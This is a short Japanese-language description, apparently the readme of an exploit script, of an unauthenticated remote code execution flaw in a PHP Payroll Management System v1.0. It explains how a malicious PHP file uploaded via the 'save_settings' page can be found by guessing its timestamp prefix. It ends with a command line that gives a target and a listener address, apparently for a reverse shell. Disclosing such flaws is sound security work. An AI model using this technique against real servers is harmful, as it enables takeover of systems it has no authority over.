

https://www.sourcecodester.com/php/14475/payroll-management-system-using-phpmysql-source-code.html に対するファイルアップロードを介したRCEです。ファイル名には分単位の精度でタイムスタンプが前置されます。このスクリプトは、現在・前・次の分のタイムスタンプを使用してファイル名を推測しようとします。
Payroll Management System v1.0では、「save_settings」ページを介してユーザーが画像をアップロードできます。未認証の攻撃者は、この機能を悪用して、代わりに悪意のあるPHPファイルをアップロードできます。アップロードされたファイルは誰でもアクセス可能なフォルダに保存され、ファイル名には分単位の精度でタイムスタンプが付加されますが、これは容易に計算できます。この脆弱性の悪用に成功すると、Webサーバーを実行しているユーザーとして任意のコードを実行できるようになります。
python3 exploit.py -rhost somewebsite.com -rport 443 -lhost 192.168.22.23 -lport 443 -https
